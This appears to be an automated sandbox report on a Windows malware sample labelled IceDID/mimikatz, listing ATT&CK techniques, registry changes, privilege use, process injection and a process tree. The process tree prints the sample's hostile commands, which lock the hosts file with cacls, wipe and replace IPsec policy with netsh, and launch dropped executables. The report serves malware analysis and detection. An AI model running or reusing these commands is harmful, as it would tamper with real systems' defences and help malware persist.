Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cmd.exesc.exesc.execacls.exe2024-09-30_13344d2d7d7c6512ac06630fe6d38104_hacktools_icedid_mimikatz.exevbhcins.execmd.exenetsh.exexohudmc.execmd.execmd.exenetsh.execmd.execuwouc.exenet.exeschtasks.exenetsh.exenetsh.execmd.execmd.exenet1.exeschtasks.exenet1.exenet1.exenet.execmd.execmd.exenet.execmd.exenetsh.exenet.exenet1.exenetsh.exenetsh.exenet1.execmd.exenet1.execmd.execacls.execmd.exewpcap.execmd.exenetsh.exeidcvbmkyl.execmd.exevbhcins.execacls.execmd.exenetsh.exenetsh.execmd.execmd.execmd.execmd.exenetsh.execmd.execmd.exenet1.exenet1.exeschtasks.exenetsh.exenetsh.exenet1.exePING.EXE

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-09-30_13344d2d7d7c6512ac06630fe6d38104_hacktools_icedid_mimikatz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vbhcins.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xohudmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cuwouc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wpcap.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	idcvbmkyl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vbhcins.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

Processes:

cmd.exePING.EXE

pid	Process
3532	cmd.exe
2860	PING.EXE

NSIS installer 3 IoCs

installer

Processes:

resource	yara_rule
behavioral2/files/0x000b000000023b9e-7.dat	nsis_installer_2
behavioral2/files/0x000a000000023c2f-15.dat	nsis_installer_1
behavioral2/files/0x000a000000023c2f-15.dat	nsis_installer_2

Modifies data under HKEY_USERS 47 IoCs

Processes:

fqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exevbhcins.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exe

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	fqqvlziek.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	fqqvlziek.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	fqqvlziek.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	fqqvlziek.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	fqqvlziek.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	fqqvlziek.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	fqqvlziek.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	vbhcins.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	fqqvlziek.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	fqqvlziek.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	fqqvlziek.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	fqqvlziek.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	vbhcins.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	fqqvlziek.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	fqqvlziek.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	fqqvlziek.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	vbhcins.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	fqqvlziek.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	fqqvlziek.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	fqqvlziek.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	fqqvlziek.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	fqqvlziek.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	fqqvlziek.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	fqqvlziek.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	fqqvlziek.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	vbhcins.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	vbhcins.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	fqqvlziek.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	fqqvlziek.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	fqqvlziek.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	fqqvlziek.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	fqqvlziek.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	fqqvlziek.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	fqqvlziek.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	fqqvlziek.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	fqqvlziek.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	fqqvlziek.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	fqqvlziek.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	fqqvlziek.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	fqqvlziek.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	fqqvlziek.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	fqqvlziek.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	fqqvlziek.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	fqqvlziek.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	vbhcins.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	fqqvlziek.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	fqqvlziek.exe

Modifies registry class 14 IoCs

Processes:

vbhcins.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	vbhcins.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	vbhcins.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	vbhcins.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	vbhcins.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	vbhcins.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	vbhcins.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	vbhcins.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	vbhcins.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	vbhcins.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	vbhcins.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	vbhcins.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	vbhcins.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	vbhcins.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	vbhcins.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

Processes:

PING.EXE

pid	Process
2860	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid	Process
2484	schtasks.exe
3668	schtasks.exe
4912	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

vbhcins.exe

pid	Process
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe

Suspicious behavior: LoadsDriver 15 IoCs

Processes:

pid	Process
660
660
660
660
660
660
660
660
660
660
660
660
660
660
660

Suspicious behavior: RenamesItself 1 IoCs

Processes:

2024-09-30_13344d2d7d7c6512ac06630fe6d38104_hacktools_icedid_mimikatz.exe

pid	Process
3176	2024-09-30_13344d2d7d7c6512ac06630fe6d38104_hacktools_icedid_mimikatz.exe

Suspicious use of AdjustPrivilegeToken 23 IoCs

Processes:

2024-09-30_13344d2d7d7c6512ac06630fe6d38104_hacktools_icedid_mimikatz.exevbhcins.exevbhcins.exevfshost.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exe

description	pid	Process
Token: SeDebugPrivilege	3176	2024-09-30_13344d2d7d7c6512ac06630fe6d38104_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege	2144	vbhcins.exe
Token: SeDebugPrivilege	1900	vbhcins.exe
Token: SeDebugPrivilege	656	vfshost.exe
Token: SeDebugPrivilege	4760	fqqvlziek.exe
Token: SeDebugPrivilege	2796	fqqvlziek.exe
Token: SeDebugPrivilege	1984	fqqvlziek.exe
Token: SeDebugPrivilege	2340	fqqvlziek.exe
Token: SeDebugPrivilege	1936	fqqvlziek.exe
Token: SeDebugPrivilege	2948	fqqvlziek.exe
Token: SeDebugPrivilege	1072	fqqvlziek.exe
Token: SeDebugPrivilege	992	fqqvlziek.exe
Token: SeDebugPrivilege	948	fqqvlziek.exe
Token: SeDebugPrivilege	1596	fqqvlziek.exe
Token: SeDebugPrivilege	3024	fqqvlziek.exe
Token: SeDebugPrivilege	3612	fqqvlziek.exe
Token: SeDebugPrivilege	2172	fqqvlziek.exe
Token: SeDebugPrivilege	3304	fqqvlziek.exe
Token: SeDebugPrivilege	1472	fqqvlziek.exe
Token: SeDebugPrivilege	4604	fqqvlziek.exe
Token: SeDebugPrivilege	4900	fqqvlziek.exe
Token: SeDebugPrivilege	4852	fqqvlziek.exe
Token: SeDebugPrivilege	32	fqqvlziek.exe

Suspicious use of SetWindowsHookEx 10 IoCs

Processes:

2024-09-30_13344d2d7d7c6512ac06630fe6d38104_hacktools_icedid_mimikatz.exevbhcins.exevbhcins.exexohudmc.execuwouc.exevbhcins.exe

pid	Process
3176	2024-09-30_13344d2d7d7c6512ac06630fe6d38104_hacktools_icedid_mimikatz.exe
3176	2024-09-30_13344d2d7d7c6512ac06630fe6d38104_hacktools_icedid_mimikatz.exe
2144	vbhcins.exe
2144	vbhcins.exe
1900	vbhcins.exe
1900	vbhcins.exe
2564	xohudmc.exe
3224	cuwouc.exe
1684	vbhcins.exe
1684	vbhcins.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2024-09-30_13344d2d7d7c6512ac06630fe6d38104_hacktools_icedid_mimikatz.execmd.exevbhcins.execmd.execmd.exewpcap.exenet.exenet.exenet.exe

description	pid	Process	procid_target
PID 3176 wrote to memory of 3532	3176	2024-09-30_13344d2d7d7c6512ac06630fe6d38104_hacktools_icedid_mimikatz.exe	86
PID 3176 wrote to memory of 3532	3176	2024-09-30_13344d2d7d7c6512ac06630fe6d38104_hacktools_icedid_mimikatz.exe	86
PID 3176 wrote to memory of 3532	3176	2024-09-30_13344d2d7d7c6512ac06630fe6d38104_hacktools_icedid_mimikatz.exe	86
PID 3532 wrote to memory of 2860	3532	cmd.exe	88
PID 3532 wrote to memory of 2860	3532	cmd.exe	88
PID 3532 wrote to memory of 2860	3532	cmd.exe	88
PID 3532 wrote to memory of 2144	3532	cmd.exe	98
PID 3532 wrote to memory of 2144	3532	cmd.exe	98
PID 3532 wrote to memory of 2144	3532	cmd.exe	98
PID 1900 wrote to memory of 1904	1900	vbhcins.exe	100
PID 1900 wrote to memory of 1904	1900	vbhcins.exe	100
PID 1900 wrote to memory of 1904	1900	vbhcins.exe	100
PID 1904 wrote to memory of 2628	1904	cmd.exe	102
PID 1904 wrote to memory of 2628	1904	cmd.exe	102
PID 1904 wrote to memory of 2628	1904	cmd.exe	102
PID 1904 wrote to memory of 4656	1904	cmd.exe	103
PID 1904 wrote to memory of 4656	1904	cmd.exe	103
PID 1904 wrote to memory of 4656	1904	cmd.exe	103
PID 1904 wrote to memory of 3620	1904	cmd.exe	104
PID 1904 wrote to memory of 3620	1904	cmd.exe	104
PID 1904 wrote to memory of 3620	1904	cmd.exe	104
PID 1904 wrote to memory of 4668	1904	cmd.exe	105
PID 1904 wrote to memory of 4668	1904	cmd.exe	105
PID 1904 wrote to memory of 4668	1904	cmd.exe	105
PID 1904 wrote to memory of 3468	1904	cmd.exe	106
PID 1904 wrote to memory of 3468	1904	cmd.exe	106
PID 1904 wrote to memory of 3468	1904	cmd.exe	106
PID 1904 wrote to memory of 3660	1904	cmd.exe	107
PID 1904 wrote to memory of 3660	1904	cmd.exe	107
PID 1904 wrote to memory of 3660	1904	cmd.exe	107
PID 1900 wrote to memory of 3828	1900	vbhcins.exe	111
PID 1900 wrote to memory of 3828	1900	vbhcins.exe	111
PID 1900 wrote to memory of 3828	1900	vbhcins.exe	111
PID 1900 wrote to memory of 5024	1900	vbhcins.exe	113
PID 1900 wrote to memory of 5024	1900	vbhcins.exe	113
PID 1900 wrote to memory of 5024	1900	vbhcins.exe	113
PID 1900 wrote to memory of 2600	1900	vbhcins.exe	115
PID 1900 wrote to memory of 2600	1900	vbhcins.exe	115
PID 1900 wrote to memory of 2600	1900	vbhcins.exe	115
PID 1900 wrote to memory of 3480	1900	vbhcins.exe	119
PID 1900 wrote to memory of 3480	1900	vbhcins.exe	119
PID 1900 wrote to memory of 3480	1900	vbhcins.exe	119
PID 3480 wrote to memory of 2172	3480	cmd.exe	121
PID 3480 wrote to memory of 2172	3480	cmd.exe	121
PID 3480 wrote to memory of 2172	3480	cmd.exe	121
PID 2172 wrote to memory of 4604	2172	wpcap.exe	122
PID 2172 wrote to memory of 4604	2172	wpcap.exe	122
PID 2172 wrote to memory of 4604	2172	wpcap.exe	122
PID 4604 wrote to memory of 3008	4604	net.exe	124
PID 4604 wrote to memory of 3008	4604	net.exe	124
PID 4604 wrote to memory of 3008	4604	net.exe	124
PID 2172 wrote to memory of 5028	2172	wpcap.exe	126
PID 2172 wrote to memory of 5028	2172	wpcap.exe	126
PID 2172 wrote to memory of 5028	2172	wpcap.exe	126
PID 5028 wrote to memory of 2868	5028	net.exe	128
PID 5028 wrote to memory of 2868	5028	net.exe	128
PID 5028 wrote to memory of 2868	5028	net.exe	128
PID 2172 wrote to memory of 4656	2172	wpcap.exe	129
PID 2172 wrote to memory of 4656	2172	wpcap.exe	129
PID 2172 wrote to memory of 4656	2172	wpcap.exe	129
PID 4656 wrote to memory of 992	4656	net.exe	131
PID 4656 wrote to memory of 992	4656	net.exe	131
PID 4656 wrote to memory of 992	4656	net.exe	131
PID 2172 wrote to memory of 880	2172	wpcap.exe	132

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2136
- C:\Windows\TEMP\zkntmqvkv\ipqbtt.exe
  "C:\Windows\TEMP\zkntmqvkv\ipqbtt.exe"
  2⤵
  - Executes dropped EXE
  PID:2404

C:\Users\Admin\AppData\Local\Temp\2024-09-30_13344d2d7d7c6512ac06630fe6d38104_hacktools_icedid_mimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\2024-09-30_13344d2d7d7c6512ac06630fe6d38104_hacktools_icedid_mimikatz.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3176
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\cqeebcbu\vbhcins.exe
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:3532
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2860
- - C:\Windows\cqeebcbu\vbhcins.exe
    C:\Windows\cqeebcbu\vbhcins.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2144

C:\Windows\cqeebcbu\vbhcins.exe
C:\Windows\cqeebcbu\vbhcins.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1900
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1904
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2628
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    PID:4656
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3620
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4668
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3468
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3660
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static del all
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3828
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:5024
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2600
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\rvficvimb\etmcietlm\wpcap.exe /S
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3480
